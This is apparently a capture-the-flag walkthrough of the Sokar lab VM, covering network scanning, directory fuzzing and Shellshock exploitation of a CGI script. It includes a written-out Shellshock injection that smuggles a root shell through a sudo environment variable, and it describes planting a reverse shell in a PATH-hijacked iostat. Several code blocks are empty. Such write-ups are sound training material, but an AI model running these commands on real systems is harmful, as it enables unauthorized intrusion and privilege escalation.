Vulhub-sokar
Tools:
- netdiscover
- Nmap
- Nikto
- User Agent Switcher
Vulnerability:
Use netdiscover to detect target IP address
netdiscover -i eth0 -r 192.168.56.0/24
192.168.56.103 is the target.
Then run nmap to detect opening ports and running services on the target machine.
nmap -sV -v -O -A -T5 192.168.56.103 -p-
port 591 is opening, looks like it is running http service.
use nikto to scan
nikto -h 192.168.56.103:591
nothing cool.
Use wufzz to scan
wfuzz -c -z file,/usr/share/wordlists/dirbuster/directory-list-2.3-small.txt --hc 404 http://192.168.56.103/FUZZ 2>/dev/null
find an interesting path cgi-bin. Thats interesting, because it reminds shellshock.
Use brower to check the web page
The web page shows result of commands netstat and iostat.
check the source code find the cgi path /cgi-bin/cat
start to verfiy shellshock:
1
| |
Confirmed.Also find two user names bynarr and apophis
I tried to upload reverse shell
1
| |
failed. I guess because certain ports are allowed.
keep going…
check the files belong to bynarr:
1
| |
Try to read each file I got, and find the va/spool/mail/bynarr is very interesting.
so now I know I can only use port 51242 to setup reverse shell.
Also I noticed that . is in environment variable $PATH, so that I can run a script in the current path firstly.
write the reverse shell to iostat:
1
| |
add the x attribute
1
| |
After serverl seconds I got shell:
next run sudo -l to check allowed commands for bynarr
so /home/bynarr/lime which is owned by root that bynarr can run.
in order to check shell shock locally. run:
env x='() { :;}; echo vulnerable' bash -c "echo this is a test"
local shell shock works
from the sudo -l output, there are many environment variables can be used. I ued USERNAME
sudo USERNAME='() { :;}; /bin/bash' /home/bynarr/lime
get the shell:
